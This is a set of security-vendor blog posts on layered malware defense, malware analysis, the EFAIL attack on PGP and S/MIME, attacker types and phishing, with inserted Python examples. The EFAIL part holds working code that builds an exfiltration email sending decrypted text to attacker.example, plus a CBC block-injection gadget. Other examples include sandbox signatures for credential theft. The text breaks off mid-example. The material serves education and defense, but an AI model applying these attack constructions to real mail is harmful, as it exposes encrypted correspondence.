With multiple levels of protection to be on the safe side

Anti-virus solutions alone are not enough – but they still make sense

The world has become more complex, not only in politics and business but also in IT security. Multi-layered defense measures are a must for companies that want to protect their IT infrastructure effectively, because cyber threats have also become much more versatile and professional. “Simple” solutions by themselves are no longer enough, yet they still have their place.

Until a few years ago it was relatively easy to organize the protection of your IT systems, and even today there are companies that rely on a few established defensive measures. Together with a firewall and a spam filter, a classic AV solution is still the standard protection against intruders, and this kind of protection is generally accepted as a proven mechanism against malware. One of the main reasons is cost: antivirus products are highly automated and do not require much attention from IT administrators or security specialists, which saves money, time and effort.

Modern malware outwits classic AV products

On the other hand, the discussion has been smoldering for some time as to whether anti-virus solutions are still effective against malware at all, or perhaps do more harm than good and should therefore be abandoned. The fact is that classic products for defending against malware no longer offer adequate protection on their own: a classic AV scanner does not recognize every malware specimen, and some specimens are still not recognized weeks or even months after they first appear.

Strengths and weaknesses in malware detection vary widely between AV providers. In addition, newer types of attack make life increasingly difficult for classic AV scanners. Polymorphic malware, ransomware among it, evades signature-based detection by changing its form slightly with each copy. Against attacks that involve no file at all, such as CEO fraud, which is nothing but a persuasive email, a classic AV scanner has little or no chance, because there is no suspicious object for it to examine.

Equally problematic are links in documents that lead to a malware download only after the document has passed the scanner. Companies that rely solely on classic security solutions lull themselves into a false sense of security. Nevertheless, the use of classic AV scanners remains necessary and sensible.

Many defensive measures spoil the attacker’s success

Modern IT security solutions and suites are built on the principle of multiple protection with several defense methods in sequence, and there are good reasons for multi-level protection. If the first protective measures settle part of the task in a relatively simple way, the powerful and more complex filters behind them receive less load and therefore perform better.

Subsequent security levels based on heuristic or behavior-based filter systems significantly improve detection performance and thus increase the chance of being spared damage by malware. These include services that detect hidden links in emails or attachments, analyze the behavior of malware in a sandbox, or hold back suspicious email attachments for a certain period of time and then check these attachments again with updated signatures.
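As an added illustration (not Hornetsecurity's filter code), the following Python sketch orders three layers from cheap to expensive, so that only messages the cheap layers cannot decide reach the sandbox, and re-checks held attachments against an updated signature set. The messages, hashes, spam tokens and the sandbox stand-in are constructed for the example.

```python
from collections import Counter

# Constructed inputs for the example: a tiny signature set, two spam tokens
# and five messages. "sandbox_behaviour" stands in for what a real detonation
# would observe; nothing here is real threat data.
KNOWN_BAD_HASHES = {"deadbeef"}
SPAM_TOKENS = ("lottery", "winner")
MESSAGES = [
    {"id": 1, "subject": "Invoice 4711", "attachment_hash": "deadbeef"},
    {"id": 2, "subject": "You are our lottery WINNER", "attachment_hash": None},
    {"id": 3, "subject": "Meeting notes", "attachment_hash": None},
    {"id": 4, "subject": "Invoice 4712", "attachment_hash": "c0ffee",
     "sandbox_behaviour": "suspicious"},
    {"id": 5, "subject": "Photos", "attachment_hash": "f00d",
     "sandbox_behaviour": "benign"},
]

# Each layer returns "malicious" or "clean" when it can decide, or None to
# pass the message on to the next, more expensive layer.
def signature_layer(msg, bad_hashes=KNOWN_BAD_HASHES):
    return "malicious" if msg.get("attachment_hash") in bad_hashes else None

def spam_layer(msg):
    if any(tok in msg["subject"].lower() for tok in SPAM_TOKENS):
        return "malicious"
    if not msg.get("attachment_hash"):
        return "clean"  # nothing to detonate, so the sandbox is never consulted
    return None

def sandbox_layer(msg):
    # Stand-in for detonation: a real sandbox would open the attachment and
    # watch file, registry and network activity.
    return "malicious" if msg.get("sandbox_behaviour") == "suspicious" else "clean"

LAYERS = [("signature", signature_layer), ("spam", spam_layer), ("sandbox", sandbox_layer)]

def filter_message(msg, stats):
    """Run the chain, counting how many messages each layer had to look at."""
    for name, layer in LAYERS:
        stats[name] += 1
        verdict = layer(msg)
        if verdict is not None:
            return name, verdict
    return "none", "clean"

def run(messages):
    stats, verdicts = Counter(), {}
    for msg in messages:
        verdicts[msg["id"]] = filter_message(msg, stats)
    return stats, verdicts

def rescan_held(messages, updated_bad_hashes):
    """Re-check held attachments once the signature set has been updated."""
    return [m["id"] for m in messages
            if signature_layer(m, updated_bad_hashes) == "malicious"]

if __name__ == "__main__":
    stats, verdicts = run(MESSAGES)
    print(dict(stats), verdicts)            # the sandbox saw 2 of 5 messages
    print(rescan_held(MESSAGES, {"f00d"}))  # [5]
```

The counters make the load argument visible: every message hits the signature layer, four reach the spam layer, and only the two with unknown attachments are detonated.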

Many companies have recognized this and rely on a multi-part defense strategy with several defensive lines in place. This way, they minimize the risk of experiencing a nasty surprise and becoming victims of a cyber-attack.

Malware Analysis and Defense

Third part of the multipart “Defense against malware”

The workstations of our malware analysts do not differ from others in Hornetsecurity’s offices, even though the Security Lab is referred to as a “laboratory”. Erlenmeyer flasks, test tubes and Bunsen burners are not to be found, only quite normal computers. The work is done virtually, in sandboxes or by analyzing data traffic. Nevertheless, the importance of the malware analysts should not be underestimated, as their work ensures that Hornetsecurity’s defense systems are always as up-to-date as possible and maintain the highest quality standard.

But what is the procedure for analyzing malware? Usually there is a very large, continuous stream of data to analyze. The main task is to extract valuable information from the raw data, process it and turn it into intelligence. To this end, analysts use various tools and programs to answer specific questions: What are the objectives of the malware? Which characteristics are typical for the malware under investigation? Is there any evidence pointing to the attacker(s)? Ideally, actions can be derived from the findings, such as writing new filter rules or creating detection algorithms.

Two different types of analysis

Two ways of analyzing malware are presented in more detail here. In static analysis, the code itself is viewed without executing the malware, while in dynamic analysis, the behavior of the malicious code is tracked in a secure environment.

In static analysis, the analysts break the malware down to the smallest detail in order to draw conclusions from the code itself without running it. For example, significant strings are extracted, helper scripts are run over the sample, and further results are generated with disassemblers. This yields information on what the malware does and on the characteristic artefacts it leaves behind, the so-called Indicators of Compromise (IoCs). Based on the findings, the individual filter systems can be updated to block further attacks by this and similar malware as quickly as possible.

One possibility for dynamic analysis is to let the malicious code perform its task in the secure environment of a sandbox. This method can be automated well to obtain certain results, and the filter systems can be updated based on them. Does the code change certain files? Does it make changes in the registry, or alter system settings such as the configured DNS servers? Which hosts does the malware contact? These and other questions can be answered this way.

Various possibilities of use

The most obvious application of the data obtained from malware analysis, for IT security companies, is to improve their defense methods and thus better protect their customers from attacks. To do this, analysts extract characteristic byte patterns and use them to create so-called YARA rules, with which malware samples can be found, categorized and grouped. Behavior signatures applied in the sandbox can detect and categorize certain behavior patterns of malicious code.
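To make the static-analysis steps described above (string extraction, IoC extraction, YARA-style pattern rules) concrete, here is an added Python example. It is not Hornetsecurity's tooling and not a real sample: the "binary" is a constructed byte string with a few recognisable artefacts, and the rule, its string names and its condition are illustrative. The hex-pattern matcher implements only the `??` wildcard of YARA's hex-string syntax.

```python
import re

# Constructed stand-in for a binary: a few recognisable artefacts embedded in
# filler bytes. It is not a real sample.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    b"URLDownloadToFileA\x00"
    b"\x01\x02http://198.51.100.23/update.exe\x00"
    b"\x6a\x40\x68\x00\x30\x00\x00"          # x86: push 40h / push 3000h (VirtualAlloc-style stub)
    b"cmd.exe /c start\x00\x07\x08"
    b"Mozilla/5.0 (Windows NT 10.0)\x00"
)

def extract_strings(data, min_len=5):
    """Printable ASCII runs of at least min_len bytes, as the `strings` tool reports them."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

IOC_PATTERNS = {
    "url": re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}

def extract_iocs(strings):
    """Network indicators found in the extracted strings, grouped by kind."""
    found = {kind: set() for kind in IOC_PATTERNS}
    for s in strings:
        for kind, pattern in IOC_PATTERNS.items():
            found[kind].update(pattern.findall(s))
    return {kind: sorted(values) for kind, values in found.items()}

def hex_pattern(spec):
    """Compile a YARA-style hex string such as '6A 40 68 ?? 30 00 00' ('??' = any byte)."""
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16) for tok in spec.split()]
    return re.compile(b"".join(parts), re.DOTALL)

# A rule in the spirit of YARA: named strings plus a condition over which of
# them matched. The names and the condition are illustrative.
RULE = {
    "name": "downloader_like",
    "strings": {
        "$api": b"URLDownloadToFileA",
        "$stub": hex_pattern("6A 40 68 ?? 30 00 00"),
        "$shell": b"cmd.exe /c",
    },
    "condition": lambda hit: hit["$stub"] and (hit["$api"] or hit["$shell"]),
}

def match_rule(rule, data):
    """Evaluate every string of the rule against the sample, then the condition."""
    hits = {}
    for name, pattern in rule["strings"].items():
        hits[name] = bool(pattern.search(data)) if hasattr(pattern, "search") else pattern in data
    return bool(rule["condition"](hits)), hits

def analyze(data):
    """Static pass: strings, IoCs and the rule verdict in one report."""
    strings = extract_strings(data)
    matched, hits = match_rule(RULE, data)
    return {"strings": strings, "iocs": extract_iocs(strings),
            "rule": RULE["name"] if matched else None, "hits": hits}

if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["iocs"], report["rule"], report["hits"])
```

The IoCs (here a URL and the IP address inside it) feed the URL and IP filters, while the rule groups any future sample that carries the same code stub together with one of the two strings, even if its hash is new.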

An example: in the sandbox, an Office document received as an email attachment is opened. There the behavioral signatures recognize that the document begins to collect information about user accounts and send it out. If this analysis takes place in a cloud-based environment, the conspicuous emails can be intercepted before delivery and the attack blocked completely.
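The sandbox questions listed earlier (files, registry, DNS settings, contacted hosts) and the credential-collecting Office document just described can both be expressed as behavior signatures over the event trace a sandbox records. The following Python is an added example, not Hornetsecurity's sandbox: the trace, the event shapes, the paths and the signature names are all constructed for illustration.

```python
# Constructed trace of the kind a sandbox records while an attachment runs.
# Event shapes, paths and the signature names are assumptions for this example.
TRACE = [
    {"type": "process", "parent": "WINWORD.EXE", "image": "powershell.exe"},
    {"type": "registry", "op": "set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\upd"},
    {"type": "file", "op": "read",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "dns", "query": "update-check.example"},
    {"type": "network", "op": "connect", "dst": "203.0.113.7:443", "sent_bytes": 48000},
]

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CREDENTIAL_STORES = ("Login Data", "logins.json", "Credentials")

def office_spawns_script_host(trace):
    return any(e["type"] == "process" and e["parent"].upper() in OFFICE_APPS
               and e["image"].lower() in SCRIPT_HOSTS for e in trace)

def run_key_persistence(trace):
    return any(e["type"] == "registry" and e["op"] == "set"
               and r"\CurrentVersion\Run" in e["key"] for e in trace)

def dns_settings_changed(trace):
    return any(e["type"] == "registry" and e["op"] == "set"
               and "NameServer" in e["key"] for e in trace)

def reads_credential_store(trace):
    return any(e["type"] == "file" and e["op"] == "read"
               and e["path"].endswith(CREDENTIAL_STORES) for e in trace)

def uploads_after_credential_read(trace, threshold=10_000):
    """Order matters: a large upload only counts once a credential store was read."""
    seen_credentials = False
    for e in trace:
        if e["type"] == "file" and e["op"] == "read" and e["path"].endswith(CREDENTIAL_STORES):
            seen_credentials = True
        elif seen_credentials and e["type"] == "network" and e.get("sent_bytes", 0) > threshold:
            return True
    return False

SIGNATURES = [
    ("office_spawns_script_host", "execution", office_spawns_script_host),
    ("run_key_persistence", "persistence", run_key_persistence),
    ("dns_settings_changed", "system_tampering", dns_settings_changed),
    ("reads_credential_store", "credential_access", reads_credential_store),
    ("uploads_after_credential_read", "exfiltration", uploads_after_credential_read),
]

def evaluate(trace):
    """Apply every signature, summarise categories and contacted hosts, and decide."""
    hits = [(name, category) for name, category, check in SIGNATURES if check(trace)]
    categories = {category for _, category in hits}
    contacts = sorted({e["query"] for e in trace if e["type"] == "dns"}
                      | {e["dst"] for e in trace if e["type"] == "network"})
    return {
        "hits": [name for name, _ in hits],
        "categories": sorted(categories),
        "contacts": contacts,
        # Block the message when the attachment both reads credentials and sends data out.
        "block": {"credential_access", "exfiltration"} <= categories,
    }

if __name__ == "__main__":
    print(evaluate(TRACE))
```

The ordered signature is the interesting one: a large upload on its own is common in benign documents, but an upload that follows a read of a browser's password store is the "collect and send account information" pattern from the example, and that combination is what triggers the block.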

All of these and many other defense measures should help to intercept and prevent an attack at the earliest possible point so that the damage caused by malware is as small as possible or, better yet, does not occur at all.

Much of the raw data obtained by malware analysis and the findings derived from it are also useful for general prevention. Research projects can benefit from this and make their scientifically-sound results available to the general public. In addition, the publication of malware analyses also serves to educate the public. Increasing knowledge about the approaches of cyber attacks and malware attacks helps to limit their success rates.

EFAIL: A vulnerability in the PGP and S/MIME encryption methods?

UPDATE from May 16, 2018:

In order to proactively protect those of our corporate customers who still encrypt and decrypt their emails with an in-house solution and have not yet booked the Hornetsecurity Encryption Service, we have also developed a special filter level for attacks following the EFAIL pattern. The only prerequisite is that their email communication runs via the Hornetsecurity servers, which is generally the case with our email security products.

The filter level is already activated by default for all customers who have booked at least the Hornetsecurity spam filter service. It protects not only against EFAIL but also against future attacks with similar patterns.

+++++

A long-known weakness is turned against PGP- and S/MIME-encrypted email and takes email manipulation to a new level. No problem for Hornetsecurity.

On Monday, May 14, 2018, a team of security researchers from the University of Applied Sciences Münster, the Ruhr University Bochum and the University of Leuven (Belgium) published a paper that questions the security of the PGP and S/MIME encryption standards and attracted worldwide attention.

However, the vulnerabilities described (CVE-2017-17688 and CVE-2017-17689) are not flaws in the protocols themselves. They exploit an already known weakness: the victim's own mail client is made to decrypt a captured message and send the plaintext to the attacker.

A prerequisite for the attacks is that the attacker already possesses the emails in encrypted form. To obtain them, the emails must be intercepted in transit: the attacker must previously have carried out a man-in-the-middle attack (MitM) or compromised a mail server through which the emails pass. Only if these requirements are met can the attacker execute one of the EFAIL attacks described in the paper.

The authors of the paper present two similar attacking methods to decrypt emails with existing PGP or S/MIME encryption.

The first method is quite simple, but limited to certain email clients (Apple Mail, iOS Mail, Mozilla Thunderbird) and to the third-party encryption plug-ins installed there:

The attacker creates an email with three body parts. The first part is HTML and opens an image tag whose src attribute points at a website under the attacker's control; neither the quotation marks nor the image tag are closed. The second body part is the captured PGP- or S/MIME-encrypted text. The third part is HTML again and closes the quotation marks and the image tag from the first part.

[Image: structure of the three-part EFAIL email] (Source: EFAIL attacks, 14/05/04)

If the attacker sends this email to the sender of the encrypted message (or to anyone else who holds the key to it), the client may decrypt the middle part and, when rendering the three parts as one HTML document, request the image URL with the decrypted text appended to it, thus transmitting the plaintext to the attacker's website. For this to work, the email client must be configured to download external images automatically, without asking the user.
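The three-part message and the way a careless client turns it into one HTML document can be reproduced with the Python standard library. The following is an added example, not code from the EFAIL paper or from Hornetsecurity: the "captured ciphertext" is a constructed reversed string and `stub_decrypt` simply reverses it back, so the example runs without keys; the attacker host is an example name. The last function is the gateway check the page's own protection relies on, rejecting messages that mix an encrypted part with other body parts in one multipart/mixed container.

```python
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from html.parser import HTMLParser

ATTACKER = "http://attacker.example/"   # assumed collection URL for the example
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/pgp-encrypted", "multipart/encrypted"}

def build_efail_message(captured_ciphertext):
    """Three body parts: an unclosed <img src=", the captured encrypted part, the closing quote."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "attacker@example.net"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Re: your message"
    msg.attach(MIMEText('<img src="' + ATTACKER, "html"))
    msg.attach(MIMEApplication(captured_ciphertext, "pkcs7-mime", name="smime.p7m"))
    msg.attach(MIMEText('">', "html"))
    return msg

def build_plain_encrypted(captured_ciphertext):
    """Control: a message that is nothing but the encrypted part, as S/MIME normally sends it."""
    return MIMEApplication(captured_ciphertext, "pkcs7-mime", name="smime.p7m")

def stub_decrypt(ciphertext):
    # Stand-in for the client's S/MIME or PGP decryption. The constructed
    # "ciphertext" is just the plaintext reversed, so no keys are needed.
    return ciphertext[::-1].decode()

def naive_render(msg):
    """Model of a client that decrypts each part and shows all parts as one HTML document."""
    pieces = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype in ENCRYPTED_TYPES:
            pieces.append(stub_decrypt(part.get_payload(decode=True)))
        elif ctype.startswith("text/"):
            pieces.append(part.get_payload(decode=True).decode())
    return "".join(pieces)

class ImgSources(HTMLParser):
    """Collect every <img src=...> the rendered document would fetch."""
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.urls.extend(value for name, value in attrs if name == "src")

def fetched_urls(html):
    parser = ImgSources()
    parser.feed(html)
    return parser.urls

def mixes_encrypted_with_other_parts(msg):
    """Gateway check: an encrypted part sitting next to other parts in one
    multipart/mixed container is exactly what this attack variant needs."""
    for part in msg.walk():
        if part.get_content_type() == "multipart/mixed":
            children = part.get_payload()
            if len(children) > 1 and any(c.get_content_type() in ENCRYPTED_TYPES for c in children):
                return True
    return False

# Constructed secret; the "captured ciphertext" is its reversal (see stub_decrypt).
SECRET = "Meeting moved to Friday, room 4"
CAPTURED = SECRET.encode()[::-1]

def demo():
    msg = build_efail_message(CAPTURED)
    urls = fetched_urls(naive_render(msg))
    return {"leaked": urls, "blocked": mixes_encrypted_with_other_parts(msg)}

if __name__ == "__main__":
    print(demo())
```

The rendered document is `<img src="http://attacker.example/Meeting moved to Friday, room 4">`, so a client that fetches remote images automatically sends the plaintext to the attacker as part of the URL. The same check that flags the crafted message leaves a message consisting only of the encrypted part untouched.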

The second way to read PGP- or S/MIME-encrypted emails relies on a well-known property of the block cipher modes used: the ciphertext can be modified so that blocks of the attacker's choosing appear in the decrypted message.

The attack scenarios are called the CBC attack (S/MIME) and the CFB attack (PGP). They rely on a portion of plaintext that the attacker can predict, such as the MIME header at the start of the encrypted body, and use it to overwrite the following blocks with content of their own. As in the first variant, the EFAIL attack inserts an image tag pointing at an attacker-controlled website into the encrypted text. If the manipulated message is then delivered to the actual recipient of the encrypted message, it may be decrypted and its contents transmitted to the attacker.
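The CBC manipulation behind the S/MIME variant can be shown in a few lines, because it depends only on how CBC chains blocks, not on the block cipher. The following Python is an added example, not the paper's code: a hash-based Feistel network stands in for AES so that the example runs without a crypto library (it is not a secure cipher and is labelled as such), the key, IV and message are constructed, and the known plaintext block is the predictable start of the MIME body. In CBC, P_i = D(C_i) XOR C_{i-1}, so replacing C_{i-1} by C_{i-1} XOR P_i XOR X makes block i decrypt to X, at the price of one garbage block in front of it; the attacker repeats this for each block to inject and then appends the original ciphertext so the secret follows the injected tag. The CFB variant works on the same principle and is not shown.

```python
import hashlib

BLOCK = 16          # block size in bytes
ROUNDS = 4

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte block cipher (a hash-based Feistel network) standing in for AES.
# It is NOT secure and exists only so the example runs without a crypto library;
# CBC malleability does not depend on which block cipher is used.
def _round(key, r, half):
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]

def encrypt_block(key, block):
    left, right = block[:8], block[8:]
    for r in range(ROUNDS):
        left, right = right, xor(left, _round(key, r, right))
    return left + right

def decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = xor(right, _round(key, r, left)), left
    return left + right

def cbc_encrypt(key, iv, plaintext):
    """Returns IV || C1 || C2 ...; plaintext length must be a multiple of BLOCK."""
    out, prev = [iv], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(xor(decrypt_block(key, c), prev) for prev, c in zip(blocks, blocks[1:]))

def cbc_gadget(ciphertext, known_index, known_plaintext, chosen_blocks):
    """Attacker side: knows the ciphertext and the plaintext of block `known_index`
    (>= 1), but not the key. Builds a ciphertext that decrypts to each chosen
    block (each preceded by one garbage block), followed by the original tail."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    c_prev, c_known = blocks[known_index - 1], blocks[known_index]
    forged = []
    for x in chosen_blocks:
        # D(c_known) = P XOR c_prev, so this predecessor makes c_known decrypt to x.
        forged += [xor(xor(c_prev, known_plaintext), x), c_known]
    return b"".join(forged + blocks[known_index + 1:])

KEY = b"example-key-0001"                     # constructed; the attacker never learns it
IV = b"\x00" * BLOCK
HEADER = b"Content-Type: text/plain"           # predictable start of an S/MIME body
SECRET = b"Meeting moved to Friday, room 4"    # constructed secret
PLAINTEXT = (HEADER + b"\r\n\r\n" + SECRET).ljust(64, b" ")   # 59 bytes, padded to 64

def demo():
    ciphertext = cbc_encrypt(KEY, IV, PLAINTEXT)
    inject = [b'<img src="http:/', b'/x.example/?data']     # two 16-byte blocks to inject
    forged = cbc_gadget(ciphertext, 1, PLAINTEXT[:BLOCK], inject)
    recovered = cbc_decrypt(KEY, forged)      # what the victim's client decrypts
    return [recovered[i:i + BLOCK] for i in range(0, len(recovered), BLOCK)]

if __name__ == "__main__":
    for block in demo():
        print(block)
```

The decrypted result is the first injected block, a garbage block, the second injected block, and then the original message from its second block onward. The attacker cannot avoid the garbage blocks; the paper's contribution is arranging the injected text so that they land somewhere an HTML renderer tolerates, and so that the secret ends up inside the image URL.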

Emails encrypted by Hornetsecurity are protected by design against attacks of this kind, because Hornetsecurity does not allow the mixing of encrypted and unencrypted content types (multipart/mixed) that the attack requires.

The encryption methods themselves, S/MIME and PGP, were not broken; rather, vulnerabilities were found in the way email clients handle HTML emails, which allow these encryption techniques to be bypassed. In addition, we object to the recommendation of various security researchers to generally deactivate content encryption: even after this publication, PGP and S/MIME are not per se less secure than transport encryption alone or no encryption at all. Since the attack requires a MitM position, i.e. any transport encryption has already been broken, generally switching off content encryption would be fatal: attackers could then read the email traffic directly, like a postcard.

Hornetsecurity Encryption Service, which is immune to EFAIL, does not require any client plug-ins: Encryption and decryption are fully automated by Hornetsecurity in the cloud – no installation, maintenance or user interaction is required – simply secure!

The who’s who of cybercriminals

In the first part of our little blog series on the basics of malware we dealt with the terminology of viruses, worms and the like, and found that the types of cyberattack have changed considerably over the years. Until a few years ago, relatively simple spam messages and viruses were distributed widely according to the minimax principle (minimum effort, maximum reach). Today, attacks are more sophisticated and more individual, because defense mechanisms have adapted and the detection of mass spam and virus waves has improved significantly. Before this series explores how malware can be analyzed and fended off, let’s shed light on who is behind all these attacks.

The stereotype of a hacker looks something like this: A pale, hoodie-wearing, single man sits in a dark basement while eating pizza and drinking cola. From here, he is hacking code into a computer and attacks his targets. The reality of it is much more complex. Nowadays, cyber-attackers are acting like small businesses – they consist of teams whose members specialize in subtasks and who professionally distribute their “goods”. After all, this industry has become a highly lucrative field of activity and cybercrime revenues are said to be even higher than in worldwide drug trafficking.

More than just nerds sitting in basements

To security professionals’ dismay, there are a large number of different cybercrime groups. To complete the picture, the field of cyberwar has to be included as well; the goals there are often not monetary but ideological or political.

The following list shows some groups that most cybercriminals can be divided into:

Professional criminals

This group includes all those who pursue purely economic goals with their cyber-attacks. Their aim is to generate the highest possible amount of money, in whatever form. In addition to banking trojans and spyware, they use ransomware attacks or crypto-mining malware. The sale of stolen data and information should also be mentioned: selling lists of email addresses or other personal information, botnets and other content can be highly profitable. Even the sale of malware itself falls into this category: attacks are offered as a service, so that even technically less experienced or less well-equipped people can launch them. This could be in the form of a new ransomware, but also in the form of a simple DDoS attack on companies, organizations and government agencies.

State actors

These are actors that can be attributed to national governments. One of their main goals is to improve the situation for their own country, be it through hacker attacks or through sabotage, classic espionage or the infiltration of opponents.

Although individual countries do not communicate these activities openly, they are an open secret, and countries repeatedly blame each other for such attacks. At the time of writing, the American FBI and the British National Cyber Security Centre (NCSC) accuse Russia of being responsible for a large-scale cyberattack in which network infrastructures were infiltrated on a large scale. Incidentally, the two authorities describe the intrusion in terms of the cyber kill chain.

To combat crime and terrorism, authorities actively use certain programs to monitor target persons and obtain information relevant to investigations; the German “Federal Trojan” (Bundestrojaner), which is reportedly already in use, is one example. Officially, state bodies are subject to the legislative and the judiciary, but in reality this control has gaps.

Some state institutions even collect knowledge about security holes without having them closed, so that they can exploit them themselves. The problem is that if these so-called zero-day exploits fall into the wrong hands they can be misused, as happened in the WannaCry ransomware attack, which used an exploit that had leaked from the NSA and which was attributed to North Korean hacker groups.

Activists, political groups

This group of cyber criminals, also known as “hacktivists”, conducts cyberattacks based on their ideological views. Victims can include private companies, politicians or state organs. They try to enforce their political, social or other ideas through their attacks. In addition to classic hacking, DDoS attacks are used as well.

Hacktivists include the groups Anonymous, WikiLeaks and LulzSec.

Private companies

The private sector is not immune to the activities of cybercrime. Generalized as industrial espionage, the goal of this group of attackers is to spy on their competitors, gain information, and use it for their own benefit.

Vandal / “jesters”

These attackers do not set strategic goals for their cyber-attacks – they are more concerned with satisfying their curiosity, trying out new ideas, and gaining recognition for their achievements. It might also be the pure pleasure of destruction that drives this group of people.

Security researchers

There are also people who are actively looking for vulnerabilities in IT infrastructures to increase the security of IT systems. These experts can be found in public institutions such as universities and public authorities, but also in private companies in so-called “security labs”. The difficulty sometimes lies in cybercriminals being able to misuse and exploit these published findings for their own purposes.

Money is the main driver

The main motivation behind the attacks is telling: according to Verizon’s recent Data Breach Investigations Report, 76% of all security breaches last year were financially motivated, followed by espionage, “fun” and personal grudges. Another interesting figure from the same study: 28% of all data breaches involved internal staff.

The next part of our series will explore how malware analysis works and how to develop defense strategies based on these findings.

“For your safety” – Beware of fake ING-DiBa emails

Cybercriminals are currently trying to obtain sensitive data from ING-DiBa customers with dubious fake emails. The fake email claims that a problem has occurred during a routine security check of the online banking system. It advises that customers should immediately log on to an external website to avoid troubles with their bank.

However, in reality, this is a phishing attack that tries to collect personal information. In the following blog article, you will learn in detail how to protect yourself from fake emails or phishing attacks.

The fake email from our example

[Image: a German ING-DiBa fake email]

The picture shows the detailed structure of the fake email, allegedly sent by ING-DiBa, as displayed in an iPhone mailbox. In fact, the email is part of a mass phishing campaign and was sent to a large number of recipients.

The subject line reads “For Your Safety (Reference Number: xyz)”, where the apparently random reference number was “kx5qrvnzx3h” in this case. Before we blacked out the personal information for data protection reasons, we noticed that the recipient’s address and the sender’s address were identical. This was already a first indication of a fake email.

This trick is not uncommon when perpetrators gather information about randomly selected victims via phishing. Recipients are especially inclined to follow the link if the phishing email is opened on a mobile device, as it was in this case, and all the more so if they actually are customers of the bank named in the email.

In everyday life, recipients of phishing emails are also quick to follow the link. The attacker even offers options for recipients who do not have an account with ING-DiBa: in our example, a flashy red button lets the recipient allegedly declare that he is not a customer. The destination of that link, however, is the same phishing website, which is intended to harvest user data from mostly unsuspecting victims on a large scale. The fake security notification in the name of ING-DiBa is not an isolated case.

6 tips to detect phishing or fake emails

With the following tips, you will be able to detect phishing or fake emails to protect yourself from being affected by such attacks.

Feature No. 1: The salutation

It is striking that either a standard phrase is used to address the target person, or the salutation is missing entirely. Only rarely are recipients of phishing emails addressed by their full name, because fake emails are not isolated cases but automated emails sent out millions of times; individual salutations are the exception. In our example there was no salutation at all.

Once a victim has followed the link, entered his details into the form fields and pressed the confirmation button, the cybercriminal is in possession of the login details. He can then place orders in online shops under a false name or gain access to sensitive account or company data. The phishing attack has succeeded.

Feature No. 2: Content of the email

A phishing email is worded to hide its true intentions from the recipient, at least until he first clicks one of the links. The following baits are very popular with cyber crooks:

  • Fake emails in the form of alleged PayPal security notifications
  • Phishing emails which seem to come from banks or other institutions
  • Fake email notifications that seem to come from Amazon or Ebay
  • Fake security issues in social media accounts that need to be resolved promptly

This shows that cybercriminals are very creative when it comes to fooling their victims.

Feature No. 3: The call to action

Once the attacker has created and sent out his fake email, he urges the recipient to act. In this specific case, the targeted person is initially led to an external page by clicking on a link. This page usually resembles closely the login area of a bank, an online retailer or any other company that offers certain Internet services.

Feature No. 4: The time shortage

An effective means often used by attackers is a time limit. This is an attempt to put the victim under stress and distract them. In our example, this is stated as follows: “Please log into your account as soon as possible to avoid any delay in your banking activities.”

Fear-spreading phrases in the subject line, such as “Your account has been suspended” or “An amount has been debited from your account” are also quite popular and common. These sentences cause some recipients to panic, so they follow the attached link without much thought.

Feature No. 5: Questionable buttons and links

In order to successfully carry out the process of phishing, a related link in text or button form is part of the standard repertoire of any phishing or fake email. This is also the case in our example.

Therefore, when it comes to questionable security queries that have a link, we recommend that you do not access these links from your email program. Instead, you should always directly log in to your user accounts via a browser or via the official website of the provider. This applies to online services of any kind.

Feature No. 6: This is how reputable companies and institutes work

As far as the detection of phishing emails or fake emails is concerned, it should always be remembered that reputable companies or institutes would never ask you to disclose personal information via email.

For this reason, various banks regularly point to the problem of fake emails or the so-called phishing mails. One bank states for example:

“Volksbank Raiffeisenbank or BVR will never ask bank customers for personal information such as PIN or account number via email. Neither will we insert a link to online banking in emails or ask bank customers to make test or remittance transfers. These practices are always indicators of attempted fraud.” (Source: Volksbank Raiffeisenbank)

Therefore, you can delete such an email immediately. This is ultimately the simplest way to counter a phishing attack.
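The six features above can be turned into a mechanical check that runs over an incoming message. The following Python is an added example, not Hornetsecurity's filter: the two messages are constructed (the first is modelled on the ING-DiBa mail described in this post, with example.net/example.org hosts standing in for the real addresses), and the phrase lists, the login-path pattern and the upload of a "brand name in the link text" comparison are illustrative heuristics, not a complete phishing detector.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message modelled on the one described above; addresses and hosts
# are example names, not the real phishing infrastructure.
SAMPLE = """\
From: ING-DiBa <kunde@example.org>
To: kunde@example.org
Subject: For Your Safety (Reference Number: kx5qrvnzx3h)
Content-Type: text/html; charset=utf-8

<html><body>
<p>Dear customer,</p>
<p>A problem occurred during a routine security check of the online banking system.
Please log into your account as soon as possible to avoid any delay in your banking activities.</p>
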